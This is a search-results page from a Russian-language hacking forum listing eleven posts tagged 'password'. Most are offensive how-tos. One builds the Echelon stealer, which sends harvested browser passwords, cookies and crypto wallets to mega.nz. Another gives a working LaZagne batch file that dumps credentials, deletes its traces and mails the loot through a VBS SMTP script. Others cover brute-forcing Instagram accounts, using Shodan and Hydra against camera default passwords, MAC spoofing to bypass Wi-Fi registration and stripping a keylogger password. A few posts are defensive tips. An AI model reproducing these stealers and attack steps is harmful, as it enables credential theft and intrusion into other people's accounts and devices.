Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'пароль'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 11 results

  1. Приветствую, хакеры! Банковский пароль может быть украден как злоумышленником, так и знакомым жертве человеком, получившим доступ к паролю либо к устройству жертвы, где он сохранен, рассказал агентству "Прайм" директор Центра экспертизы Способов утечки учетных данных пользователя несколько: подбор пароля злоумышленником ввиду его слабости к взлому;ввод учетных данных на фишинговом сайте или в переписке;небрежность в хранении парольной информации (запись на бумажные носители, сохранение в браузере на общем компьютере и т. п.);взлом или заражение вредоносным ПО устройства жертвы, на котором пароль вводится или сохранен;получение пароля лично от жертвы методами социального инжиниринга, перечислил эксперт.При этом он отмечает, что в большинстве случаев злоумышленник не может украсть пароль без содействия либо халатности со стороны его владельца. "Для защиты банковских данных нужно соблюдать все основные правила гигиены информационной безопасности. С точки зрения создания и использования паролей важно, как минимум, чтобы пароль был сложным, не словарным и не содержал информацию о вас или месте, где он создан", — говорит Соленик. Кроме того, пароль не должен быть словарным, то есть чтобы его нельзя было найти в словаре русского, английского и прочих языков, пароль должен быть уникальным и не использоваться на других сервисах. Также пароль необходимо менять время от времени – хотя бы раз в один-три месяца, советует эксперт. Оптимально, если пароль составлен из нескольких случайных слов со специально допущенными ошибками или подменой символов, и он используется только для данного важного сайта. Например, "Ч0рный!маГнит"", — говорит он. Соленик также рекомендует всегда проверять адрес сайта, где вводится пароль, не переходить в личный кабинет банка по недоверенным ссылкам, не вестись на заманчивые предложения по почте или телефону. "Помните, что ваш пароль или PIN-код не знает и не должен знать никто кроме вас – даже сотрудники банка или родственники! И просто не создавайте предпосылок, чтобы кто-то кроме вас его узнал", — заключил эксперт. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Привет хакеры! Сегодня будем собирать свой стиллер из исходников Echelon Stealer v6. Функционал Браузеры: все браузеры на основе Chromium, все браузеры на основе Gecko (Mozilla) включая x32 и x64 версии, старые версии Edge и ie, рекурсивный сбор всех данных: пароли, история, авто-заполнение, cookies, cards, стилер криптокошельков - сессий и .dat файлов. Стиллер сессий: Discord, Telegram, Steam, FileZilla, Total Commander, Psi+, Pidgin и др. Граббер файлов: можно ограничить вес каждого файла, можно указать свои расширения для граббинга, по умолчанию собирает файлы с расширениями ".txt", ".doc", ".cs", ".json", ".suo", ".sql", рабочий стол и все подпапки, названия папок и их вложенность сохраняется как есть. Отправка лога осуществляется на: https://mega.nz Установка и настройка Устанавливаем Visual Studio, если еще не установлена. Качаем проект и открываем Echelon.sln, переходим к Program.cs. Настраиваем по скрину, не забывая ввести данные от mega.nz. Запускаем сборку обязательно на конфигурации Release! Для первого запуска проект нужно собрать как "Консольное приложение", чтобы убедиться в работоспособности. Если все нормально - собираем как "Приложение Windows". Собранный файл, уже скомпилированный, будет лежать в папке OUTPUT в корне проекта. Скачать Echelon Stealer v6. Внимание! Файл не проверен на вирусы! Осторожно! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Привет ребята, хочу рассказать вам о простом коде, который можно использовать для перебора рандомных созданных паролей, для взлома. Конечно, для демонстрации взламывать мы будем свой пароль, который мы введем, потому что этот код не предназначен быть скриптом для брута, это лишь небольшое пособие новичкам в программирование, чтобы они уяснили, как работают подобные скрипты. Первым делом необходимо определиться с языком программирования. Думаю из названия статьи вы уже поняли, что использоваться будет язык Python, он легок в понимании и приятен глазу. С помощью питона будет легко показать, как происходит перебор паролей. Думаю стоит закончит предисловие и прейти к делу. Первым делом нам нужно импортировать модули, понадобиться только модуль random. Ипортируем: Теперь необходимо определить переменные, всего их будет 6 Это все переменные необходимые для работы скрипта. Далее мы создаем цикл. В цикле будет выполнятся вся работе. Также добавим данную строчку для того, чтобы обнуляться переменную password. Теперь нас ждет самое интересное – генерация и перебор паролей. Для начала создаем цикл for, чтобы генерировать пароли. Тут понадобится переменная length Теперь создаем код, с помощью которого можно будет узнать, был ли ранее сгенерирован тот или иной пароль, а также проверить идентичен ли он. Собственно это все, нет ничего сложного. Я надеюсь, что данная небольшая статья помогла кому-то разобраться в этих тонкостях. Возможно даже вы когда-нибудь станете хакером.
  4. Привет, хотелось бы донести очень важную и весьма интересную информацию до вас. Совсем недавно создатель компании под название Nitro-Team и по совместительство специалист информационной информации Батыржан Тютеев создал специального бота в мессенджере Телеграм. Имеет всего одну функцию, но она невероятна, введя любую почту данному боту, он покажет вам пароли, которые утекли в сети от данных электронных адресов. База данных Телеграм-бота насчитывает более девяти миллиардов строк данных, а скоро база будет расширена до двенадцати миллиардов. Разработчик говорит, что база пополняется не только от общедоступных источников, но и с закрытых ресурсов, никогда не светившихся. Что необходимо сделать для проверки утечки паролей почты: 1. Зайти в телеграмм-канал - https://t.me/mailsearchbot 2. В строке ввода написать желаемый e-mail. 3. Ждем несколько секунд и получаем список слитый паролей. Так же бот может показывать пароль и от сайтов, где указывалась введенная вами почта при регистрации. Статья вышла очень короткой, но очень важной. Этой огромной базой данных может воспользоваться и мошенник. Но это отличный способ защитить собственную почту. Если ваш пароль оказался слитым на данном ресурсе, то скорее бегите менять пароль. Есть возможность быть быстро взломанным.
  5. Всем привет, прямо сейчас я хотел бы немного рассказать о том, как можно взломать чей-то аккаунта в Instagram. Этот способ не является уникальным, даже наоборот, он очень распространен, речь пойдет о BruteForce. Прежде чем начать, вы должны понимать азы и в принципе понимать хоть что-то. BruteForce – способ подборки паролей, заключается в переборки всевозможных комбинаций. GitHub – один из самых крупных сервисов, который служит хостингом ИТ-кампаний и их общего создания проектов. Python – язык программирования, который нацелен на улучшение продуктивности разработчика и понимания кода. Итак, чтобы начать перебирать пароли нам понадобится специальный скрипт, который создан с помощью Python. Установить его можно на любую ОС, он очень легок в освоении. Перейдем к делу. Сначала нам нужно установить на компьютер Python. Понадобится он нам для того, чтобы запустить скрипт. Теперь переходим непосредственно к самому скрипту с GitHub - https://github.com/N3TC4T/InstaBrute/archive/master.zip Распаковываем InstaBrute-Master. Далее нам необходимо создать или же где-то скачать пароли для брута. После этого нам нужно будет заполучить парочку прокси и перенести их в текстовый документ. Теперь открываем консоль, с помощью – cmd и перемещаем туда скачанный скрипт instabrute.py. Далее поставив пробел мы пишем –u (логин жертвы) –w(имя документа с пароялми) –p (документ с прокси) –t (кол-во поток, обычно это 4) –d –v Жмем на клавишу Enter и ожидаем. Если вы везучий человек, то через какое-то время вы сможете обнаружить пароль от необходимого вам аккаунта. Я не призываю к действиям, а хочу лишь обезопасить ваши данные от кражи.
  6. Многие вирусописатели и хакеры используют Punto Switcher для задач кейлоггера (включая функцию дневник), не забывая установить пароль от лишних глаз. Дневник Punto Switcher поможет сохранить и упорядочить текстовую информацию, которую вы набираете на клавиатуре. Это может быть полезно для цитирования переписки в социальных сетях, на форумах и в чатах, для восстановления текста после сбоя компьютера или необратимого изменения документа и т. д. С помощью дневника Punto Switcher можно: Автоматически записывать текст из буфера обмена.Записать информацию, набираемую на клавиатуре.Сохранить выделенный текст с помощью горячих клавиш.Искать и выборочно просматривать сохраненную информацию.Удалить сохраненные записи.Стандартное место для punto-switcher-setup-4.4.3-bild-407 C:\Users\{USER}\AppData\Roaming\Yandex\Punto Switcher\User Data но файл Дневника - "diary.dat" может находится по дальше от глаз пользователя, все зависит от того куда скрывают от пользователя сам факт установки или случайное нахождение растущего файла. Мы с Вами рассмотрим такой файл с паролем, ниже на screen выделен участок в котором и находится пароль от которого нам нужно избавиться Наша задача этот блок заменить своим Код: 50 53 44 46 36 37 2B 0C 2B 4C 20 41 17 59 7B 5A 22 58 59 20 0F 19 21 14 15 2B 38 62 15 мы создали пустой файл на 1024 Кб и сохраним его с именем nopasswordDiary.dat дабы не перепутать в начало файла вставим наш код, и к нему добавим из файла diary.dat код который находился после пароля, вышел такой вот файл Дальше мы переименовываем наш файл nopasswordDiary.dat в diary.dat и копируем наш полученный файл в папку C:\Users\{USER}\AppData\Roaming\Yandex\Punto Switcher\User Data запустим Punto Switcher
  7. 1. Отключение антивируса или файрвола Этот пункт должен проверяться самым первым. Ведь это самое подручное средство оповещения. Взломщик уменьшает уровень защиты вашего ПК, чтобы проводимые им атаками были более мощными и целесообразными. Если смотреть на это, то вы можете даже не узнать, что у вас сейчас фейковый антивирус, ведь взломщики вполне могут сделать ошибку в вашем ПО, тем самым просто отключив его. Если вы заметили, что программы, предназначенные для защиты вашего компьютера от вредоносного по, например, постоянно перезапускается или вовсе отключено, то знайте, скорее всего это взлом. Чтобы решить данную проблему вы можете отключить Интернет, затем запустить компьютер в режиме безопасности и провести сканирование компьютера без интернета. Если все совсем плохо, то можете воспользоваться восстановлением системы. 2. Ненастоящие уведомления от антивируса Фейковые предупреждения от антивируса, является еще одним явным признаком того, что вы подверглись взлому. Это значит, что вам необходимо знать, как же выглядит настоящие уведомления от вашего защитного ПО. Самым худшим в этом является то, что вы заметите подделку уже тогда, когда ваш компьютер уже будет атакован. Взломщики создают вредоносное программное обеспечение, используя незадействованное ПО с вашего ПК, чтобы получать максимум выгоды с вашего компьютера. Закрытие фейкового уведомления, с целью отключить поддельные сканирования компьютера вряд ли принесет какой-то пользы, так как наверняка вы получите предложение покупки нового защитного ПО. А после того как вы нажмете на ссылку, вы будете направленны на фишинговый сайт, где будет оставлено множество положительных отзывов. Думаю, дальше вы догадываетесь что происходит. Вы вводите данные своей кредитки, чтобы купить лицензию. Как же от этого избавиться? Завершите процесс программы в диспетчере задач, после чего запускаете свой ПК в режиме безопасности, при этом не входя в сеть. Как только вы это сделаете, то попробуйте деинсталировать вашу защитную программу. Потом запускаете компьютер в стандартном режиме и проверяете, получаете ли вы еще какие-то поддельные уведомления. После этого запускаете поиск вирусов, а также произведите чистку реестра. 3. Смена паролей сети Если вдруг, при входе на сайт вам говорят о том, что ваш пароль не верный, однако вы его только что сменили и абсолютно уверены, что он верный, то наверняка, вы подверглись взлому. Когда взломщики получают информацию о вашем аккаунте, они с легкостью могут сменить пароль с почтой, тем самым, не давая вам попасть на сайт, а значить не давать возможности обращения к тех. поддержки. Если страшное случилось, то вам сразу же нужно добираться до тех. поддержки и всеми возможными способами доказывать, что вы владелец и восстанавливать данные. 4. Рассылка с вашей электронной почты или соц. сети Есть шанс того, что с ваших аккаунтов идет отправка вредоносных писем из-за взлома, как самой учетной записи, так и вашей электронной почты. Информация из писем – это всяческий мусор и фишинговые сайты. Чтобы избавиться от этого, вам необходимо хорошо почистить ваш компьютер от мусора и прогнать его через различные антивирусы и другие утилиты для очисти. После этого меняет пароли от всех учетных записей, где у вас появилась такая проблема. 5. Программы которые вы не устанавливали Тут все не так легко. Проблема в том, что мы никогда не читаем пользовательские соглашения, где будет информация о том, не является ли программа подделкой и не установит ли она дополнительное ПО во время установки. А также все из-за того, что при установке мы просто не снимаем ненужные нам галочки. Чтобы узнать, является ли программа вирусом, вы просто вбиваете ее название в интернете, а там уже почитать о ней поподробнее, что позволит вам понять стоит ли избавиться от нее или нет. 6. Большое кол-во всплывающих окон Всплывающие окна появляются по ряду причин, одной из которых является просто плохая настройка вашего браузера, но, если вы ранее получали их не так много, а потом вдруг стали получать их очень часто, то есть большая вероятность того, что у вас на компьютере есть вредоносная программа. Одним из способов защититься от этого, это тщательно просматривать расширения браузера, ведь нередко вредоносный код находится именно в них. 7. Смена домашней страницы в браузере Если вы получали резкие изменения в вашем браузере, например, смена поисковой страницы по умолчанию, неизвестные расширения и смена стартовой страницы, то возможно вы были взломаны. Если вы заметили какие-то новые расширения у себя в списке, рекомендуется удалить их Если проблема не хочет исчезать, то как вариант - это запуск компьютера в режиме безопасности и удаление расширения именно так. 8. Перенаправление запросов Если при нажатии каких-то ссылок вы переходите не на тот сайт, который вы планировали, то это еще один явный признак того, что вы были подвержены взлому. Зачастую такие перенаправления не так сложно отследить, так как они хорошо скрываются, используя прокси. Поэтому нужно искать вредоносное ПО на вашем компьютере, а также подвергать анализу ваши действия в интернете. 9. Самостоятельное движение курсора Обычно при хаотичном перемещении курсора мыши, мы думаем о том, что есть какие-то проблемы непосредственно с вашим оборудованием. Однако если курсор ведет себя с “умом” и может запускать определенные программы, то здесь можно даже не спрашивать, вы точно были взломаны. Делаем все как обычно, запускаем в режиме безопасности и проводим чистку компьютера. 10. Резкое замедление ПК Если вдруг ваш компьютер начал сильно тупить, без какой-либо причины или же скорость интернета желает лучшего, можно подумать что-то про вашу сеть. Однако хакеры способны устанавливать специальные программы, которые работают на фоне, используя мощность вашего компьютера корыстных целях, из-за чего работа вашей системы замедляется. Если вы установите программу, которая будет сканировать мощность вашего компьютера, то вы сможете узнать, какая из посторонних программ делает вам проблемы. Также для проверки фоновых процессов, вы можете использовать диспетчер задач, там же вы сможете определить на сколько сильно они загружают вашу систему, а так же вы сможете их сразу закрыть.
  8. Если вдруг произошло так, что вы забыли пароль от вашей сети, к который вы когда-то подключали свой компьютер или же вы хотите знать, к каким же сетям подключался компьютер некоторое время назад и какие при это были использованы пароли, то я предлагаю вам к прочтению эту статью. Эта информация поможет вам только в том случае, если вы имеет прямой доступ к компьютеру. И нет никакой разницы включен он или нет и какая на нем стоит операционная система. Если вы сюда пришли, чтобы узнать к каким точкам доступа был когда-то подключен компьютер, если вы не имеете прямого доступа, то вам могут немного пригодится утилиты Airodump-ng и iSnuff-GPS. Вычисление паролей от WiFi Если вам необходимо выяснить пароль той точке, к которой подключено ваше устройство прямо сейчас, то это возможно выполнить прямо с операционной системы. Итак, нужно зайти в “Центр управления сетями и общим доступом”, там нажмите на название точик. В новом окне тыкните “Свойства беспроводной сети”. В этом окне вам следует зайти в пункт “Безопасность” и напротив пункта “Отображать вводимые знаки” вы должны поставить галочку. Если вам нужно выяснить, к каким беспроводным точкам доступа компьютер подключался когда-либо, то можно воспользоваться для этого двумя методами. Первый заключается в использовании командной строки ОС, а второй в использовании специального ПО. Открываем командную строку (Win + R после чего пишем “cmd”) Чтобы увидеть список профилей, вам будет необходимо написать эту команду: netsh wlan show profile Для получения списка паролей для всех доступных сетей, пишем команду: Netsh wlan show profile name=* key=clear А если вы хотите узнать пароль определенной точки доступа, то пишем эту команду: Netsh wlan show profile name=”название_сети” key=clear Вторым же методом является программа, имеющая свой граф. интерфейс, который позволит вам узнать использование прошлых сетей и называется она WirelessKeyView. За использование утилиты платы не взымается. Чтобы получить необходимые данные, нужно всего лишь ее запустить. Вам сразу же будет выведет список с точками доступами и паролями. Как получить пароли у неработающего компьютера Рассмотрим пример на Windows XP, где пароли от сетей находятся в реестре HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\[interface Guid]. Эти файлы имеют хорошее шифрование, поэтому через обычный просмотр реестра вы их не увидите. Однако, вышеуказанная программа способна вытаскивать пароли даже из компьютеров, не находящихся в сети, более того, она может достать пароли с тех систем, которые уже не могут запуститься. Чтобы это сделать вам нужно зайти в продвинутые опции программы и задать директорию для необходимой информации. Что хочется сказать на счет XP, как только вы введете пароль для точки доступа, он сразу же переводит его в 256-битный ключ. Как раз-таки этот ключ нам и скажет наша утилита, но, перевести этот ключ в необходимые нам символы не может. Но все хорошо, этот огромный ключ также можно использовать для получения доступа к сети. В более высоких версиях Windows никакого перевода не происходит, поэтому утилита показывает сразу оригинальные пароли. Также в следующих версиях этой операционной системы, пароли от точек доступа находятся по адресу c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\[interface Guid]. Нахожденией паролей от точек доступа в Linux Чтобы произвести подключение к точке доступа, Linux обращается к Network Manager. Данная утилита обладает собственным графическим интерфейсом. Она сохраняет все свои опции связанные с подключениями в незакрытых местах. Однако, первым делом стоит взаимодействовать с этим всем графическим интерфейсом и выяснить, к каким точкам компьютер когда-либо подключался. Для этого нажимаете на вашу иконку WiFi и далее тыкаете “Сетевые соединения”. Там будет показана вся информация о подключениях. Если вам нужно узнать пароль, то нажимаем на необходимую нам сету и после тыкаете “Изменит”. Там выбираете пункт “Защита WiFi” и на против надписи “Показывать пароль” ставите галочку. Заметьте, что для выполнениях этих действий, у нас не потребовали даже пароль администратора, а это значит, что узнать эту информацию может любой пользователь. Я уже упоминал о том, что все опции сохраняются в открытом виде, а именно по этому пути /etc/NetworkManager/system-connections/. Для того, чтобы увидеть, что же там находится, вводим команду: ls –l /etc/NetworkManager/system-connections/ Для того, чтобы получить названия точек и их пароли, набираем команду: sudo egrep –h –s –a 9 –color --T ‘ssid=’ /etc/NetworkManager/system-connections/* Как получить пароли от неработающего Linux Чтобы получить пароли с компьютером под данной операционной системы, то вы можете загрузить Live систему или же подсоединить жесткий диск компьютера этой системы к другой. Если вы исследуете данную операционную систему, то вам необходимо всего на всего смонтировать систему файлов вашего накопителя и исследовать те файлы, о которых шла речь выше.
  9. Всем привет, сегодня я вам расскажу, как собрать небольшой стиллер, выполнив всего лишь несколько простых пунктов. Наша программка будет отправлять всю вводимую информацию жертвы на вашу почту. Поэтому вооружаемся почтой и способом распространения стиллера и вперед! Начнем с того, что нам понадобится для его создания. Вот полный список: • LaZagne – программа, позволяющая восстанавливать пароли и позже записывать их в текстовый файл • Файл формата .bat который будет использовать для запуска вышеуказанной программы и указания директории хранения результатов • Скрипт VBS который понадобится для отправки письма на электронную почту • Конвертер VBS в EXE, однако, если хотите, то можете его и не использовать • Конвертер BAT в EXE 1.Нам необходимо создать файл формата .bat и записать туда эти строки: @Echo off laZagne.exe all > C:\install_error.bin TIMEOUT /T 2 sender.exe TIMEOUT /T 5 del /s "%UserProfile%\Downloads\laZagne.exe" del /s "%UserProfile%\Downloads\SENDER.exe" del /s "%UserProfile%\Desktop\laZagne.exe" del /s "%UserProfile%\Desktop\SENDER.exe" Строка “С:\install_error.bin” означает, что здесь будут храниться результаты, таймаут нужен для добавления ожидания при сохранении результата, обычно это около ста паролей в секунду. 2.Далее мы делаем обычный текстовый документ, там, где вам будет это удобно. После создания его нужно сохранить в виде .vbs файла. Туда нам нужно будет написать этот не самый большой код: Dim o_Mess, v_Conf v_Conf = "xttp://schemas.microsoft.com/cdo/configuration/" Set o_Mess = CreateObject ("CDO.Message") With o_Mess .To = "получатель@mail.com" 'место отправления .From = "Имя " 'Логин отправителя и его почта .Subject = "Log" название темы .TextBody = "BodyMail" письмо .AddAttachment "D:\install_error.bin" Прикрепление файла .TextBodyPart.Charset = "windows-1251" кодировка русских символов With .Configuration.Fields .Item(v_Conf & "sendusing") = 2 без использования каталога Server Exchange .Item(v_Conf & "smtpserver") = "smtp.mail.ru" Адрес SMTP-сервера .Item(v_Conf & "smtpauthenticate") = 1 Вид входа .Item(v_Conf & "sendusername") = "отправитель@mail.ru" логин человека .Item(v_Conf & "sendpassword") = "пароль отправителя" 'его пароль .Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465) .Item(v_Conf & "smtpusessl") = True использовать ли шифрованое подключение SSL .Item(v_Conf & "smtpconnectiontimeout") = 60 Время до завершения повторных попыток подключения .Update End With .send End With Set o_Mess = Nothing 3.Производим компиляцию всего этого месива с помощью конвертера из последнего пункта необходимых вещей. Как только вы это сделаете, просто сохраняете файл запуска и стартуете его. 4. Переходим на свою электронную почту и находим там письмо, которые было отправлено вашей программой. 5. Открываете файл с результатами в выбранной вами директории через любой текстовый редактор и собираете данные! Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  10. Сейчас я вам расскажу о том, как можно получить доступ к чужим камерам и соответственно защитится от этого. Камер для наблюдения в наше время огромное количество и используются они в совершенно различных сферах. Мы будем использовать обычную базу, с помощью который мы сможем находить эти камеры и производить к ним подбор паролей. Теория Чаще всего, после установки камеры никто не меняет ее данные для доступа. Поэтому нашей целью будет сканирование самых распространенных портов, а именно: 8000, 8080, 554. Поэтому при сканировании сетей, рекомендую сразу же выбирать данные порты. Первый способ К примеру, вы можете найти запросы в таких поисковиках, как Shodan и Censys, используя данные порты. Благодаря этому методу, вы без каких-либо проблем получите доступ к огромному кол-ву камер, на которых отсутствует пароль. Многие их находятся в неплохих местах, таких как: магазины, офисы, кафе и прочее. Таким образом вы получить доступ ко многим интересным местам. Помните, что вы также можете добавить к поиску фильтр country, который позволит получать доступ к камерам определенной страны. Второй способ Для взлома камер также можно использовать поиск стандартных соц. сетей. Рекомендую для этого выбирать заголовки страниц, когда вы смотрите изображения с видеокамер. Третий способ Этот метод является целевым. Его нужно использовать если у вас есть определенная точка и вам нужно подобрать к ней пароль или если вы хотите прогнать базу по основным паролям и найти действующие. Чтобы выполнить все эти процедуры, можно использовать программу Hydra. Но для ее работы, вам будет необходим словарь. Можно пройтись в поисках обычных паролей для сетей. Давайте я вам покажу это на данном примере. Вы выберем камеру с моделью DCS-2103. Эта модель очень часто устанавливается. Ее рабочий порт это – 80. Теперь нам нужно использовать все эти данные для поиска информации в Shodan. После того как информация будет найдена, мы копируем все айпи, который могли вас заинтересовать. После чего создаем список. Делаем словарь паролей, чтобы все это использовать в программе Hydra. Для начала вам нужно будет добавить в папку базу. В папке с программой мы должны разместить только текстовый файл с паролями, так как логин у нас будет везде одинаковый – admin, который будет иметь параметр -1, если же будет необходимость сделать базу с логинами, то для этого вам нужно будет добавить еще 1 файл в папку с программой и приписать ему параметр –L. Все валидные результаты можно найти в текстовом файле – good. Список ИП будет необходимо прописать в директорию программы с текстовым файлом targets. http-get, которая является конечной строкой в команде, необходима для соединения с помощью порта 80. Так же хотелось бы сказать несколько слов о сканировании, Если вы хотите получить номера сетей, то нужно будет воспользоваться определенными сервисами. После чего сетки вы проверите на то, имеются ли в них нужные порты. Никаких сервисов я вам не подскажу, но лучше пользоваться чем-то похожим, как masscan или vnc scanner. Можно использовать и довольно популярную программу - nmap. Все это идет только на ваше усмотрение. Ведь главной целью является – сканирование и последующее нахождение ИП с нужными вам портами. Заключение Не забывайте, что благодаря камере вы сможете не только просматривать что-либо, но еще это фотографировать и записывать сохраняя себе. Также некоторыми моделями можно управлять, а именно поворачивать их. А самое забавное – это то, что вы можете воспроизводить звуки. Какие тут нужны еще советы? Устанавливайте сложный пароль и перебрасывайте порты.
  11. Наверняка, из названия статья, вы уже поняли о чем я сегодня расскажу. Итак, что же нам понадобиться? Вот перечь: Рут-права Программа “Fing – Network Tools” Программа “Change My Mac – для изменения вашего MAC адреса” Данные приложения являются бесплатными для скачивания в Плей Маркете. Начнем, вам необходимо подключиться к сети, после отклонить запрос на регистрацию в сети. Запускаем Fing, сверху находим кнопку обновления и нажимаем ее. После ожидания несколько секунд, вы узнаете подключен ли к сети еще кто-нибудь, в таком случае вы увидите не только свое устройство, но и другие, нажав на которые, вы сможете узнать их MAC-адрес и скопировать его. Как только эта операция была выполнения, нажимаем Change My MAC, соглашаемся с предоставлением рут-доступа. Вставляем раннее скопированный адрес. Собственно это все, что нам нужно было сделать. Если хотите сделать все удобнее, то создавай еще несколько профилей, между ними можно легко переключаться. Например один из профилей вы можете использовать дома, второй в отеле и так далее. Помните, что к одной сети не могут подключиться пользователи с одинаковым MAC-адресом, поэтому вам будет необходимо ждать пока другой пользователь покинет сеть, либо самому же отключиться и попробовать позже. P.S В метро Москвы Fing по каким-то непонятным причинам не обнаруживает никаких устройств, однако, в автобусах – обнаруживает, а из-за того, что для всего транспорта создана общая сеть, то мы берем MAC-адрес в автобусе, после чего идем в метро и там уже производим подключение, никакой регистрации проходить не придется. Если вы везунчик, то вы сможете найти MAC-адрес, где будет отключена реклама.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.